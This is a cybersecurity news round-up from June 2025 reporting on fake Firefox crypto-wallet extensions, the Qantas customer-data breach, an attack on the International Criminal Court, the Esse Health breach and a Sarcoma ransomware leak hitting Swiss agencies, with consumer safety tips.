Fake Wallet Extensions, Qantas Hack Revealed, ICC Cyberattack Unveiled– Cybersecurity News [June 30, 2025]
This week’s cybersecurity round-up brings you stories you need to know, from fake crypto wallets lurking in Firefox to major breaches hitting airlines, global courts, and healthcare groups. We’ll see how threat actors are shifting from traditional tactics and which new threats are on the radar.
Stay digitally safe and well-informed about your personal information security!
Fake Crypto Wallet Extensions Swarm Firefox Add-on Store to Steal Funds
Many fake browser extensions on Firefox’s official add-on store are posing as known cryptocurrency wallets to steal sensitive user data.
They claim to be from trusted names like MetaMask, Coinbase, Trust Wallet, Phantom, Exodus, OKX, Keplr, and MyMonero. But behind the familiar logos and names, lies malicious code that silently redirects your wallet information to servers controlled by attackers. Security researchers at Koi discovered these fake add-ons and found strong signs that a malicious threat actor group might be the one responsible for the act. Most of these are copied and pasted from open-source versions of legitimate wallets, with some extra lines of code thrown in to monitor what you type and click.
If you enter anything that looks like a wallet key or seed phrase (usually over 30 characters), it gets silently grabbed and sent off to the hackers. Plus, error messages are hidden by setting their opacity to zero, so you won’t even see them. The underlying risk here is serious; basically, the master key to your crypto wallet is the seed phrase. If someone gets hold of it, they can clean out your wallet in one move, and there’s no other hack or way around to reverse it.
These fake extensions have been around since at least April, with new ones still popping up. As of now, Mozilla hasn’t issued a public response, and many of the malicious extensions are still available. Best be cautious.
Qantas Reveals Cyberattack Linked to Scattered Spider Aviation Hacks
Qantas, Australia’s biggest airline, has revealed that hackers broke into a third-party platform tied to its customer data, leading to a serious breach.
The airline spotted strange activity on a third-party system used by one of its call centers and quickly shut it down to stop further damage. Although the airline’s own systems stayed secure, it believes a large amount of customer data was stolen. About 6 million customers have service records stored on the affected platform. The full extent of the leak is still under investigation, but early checks show that names, email addresses, phone numbers, birth dates, and frequent flyer numbers were exposed.
To our relief, the good news is that no credit card details, banking information, or account passwords were compromised in the incident. Qantas has already informed the Australian Cyber Security Centre, the privacy watchdog, and federal police about the incident. It’s not yet confirmed if outside cybersecurity firms are helping with the investigation.
Qantas says it has contained the breach continuing to check what data was taken. If you’re a customer, keep an eye on your emails for updates from the airline and practice good email security by avoiding suspicious messages that ask for personal details.
International Criminal Court Targeted by New Advanced Cyberattack
The International Criminal Court, which handles cases like war crimes and genocide, says it’s investigating a new cyberattack discovered last week that it describes as “Sophisticated” and “Targeted.”
The Court’s security systems were able to detect the attack in time, and the officials contained it soon. They are still figuring out how much damage was done and if any sensitive data was touched. This is actually the second time the ICC has faced such an incident in recent years because back in September 2023, their systems were breached for espionage purposes. At that time, the threat actors carried out a careful and advanced intrusion aimed at gathering intelligence, which the ICC saw as a serious threat to its work. However, no evidence showed that data from ongoing cases or witnesses was stolen. The Court also shared that it regularly faces daily attempts to break into its systems and even caught an intelligence officer who nearly infiltrated it under the cover of being an intern.
For now, the ICC hasn’t named any suspects or said if data was leaked. Keep your software updated and follow trusted news sources for any newly released warnings.
Esse Health Reports Data Breach Impacting 263,000+ Patient Records
Over 263,000 patients of Esse Health are being warned that hackers stole their personal and health data during an April cyberattack.
On April 21, hackers broke into Esse Health’s network, knocking out patient-facing systems and phone lines, which stayed down until June 2, when everything was finally restored. While inside the network, cybercriminals viewed and copied files containing names, addresses, birth dates, health insurance details, medical record numbers, patient account numbers, and some health information, though social security numbers and the NextGen electronic medical records system weren’t affected.
Esse Health spent significant time reviewing the compromised files to figure out exactly whose data was exposed and sent letters to 263,601 people explaining what happened. Although Esse Health hasn’t confirmed what type of attack took place, experts suspect ransomware because of how long systems were offline, yet no ransomware group has admitted to it.
Right now, Esse Health urges you to check your accounts and credit reports and is offering free identity protection if you sign up by September 25, 2025, to help you stay protected.
Swiss Government Confirms Data Theft in Ransomware Incident
Switzerland’s government says sensitive data from several federal offices has been exposed after a ransomware attack hit Radix, a non-profit group in Zurich handling health projects for government agencies.
Hackers broke into Radix systems on June 16 through Sarcoma ransomware, a group that popped up in October 2024 and quickly targeted dozens of victims, including electronics maker Unimicron. Sarcoma usually sneaks in using phishing, old security flaws, or supply-chain gaps, then takes advantage of remote desktop connections to roam networks, stealing and sometimes locking data. After Radix refused to pay, the attackers dumped a massive 1.3TB of data on the dark web on June 29, containing scans of documents, financial records, contracts, and private communications, offering it free for download. The organization has notified everyone who was affected and insists there’s no sign that partner organizations’ sensitive data was hit.
On the other hand, Swiss authorities and the National Cyber Security Centre are still digging through the leaked files. So, watch out for phishing attempts, suspicious emails, or anyone trying to steal your passwords or financial details.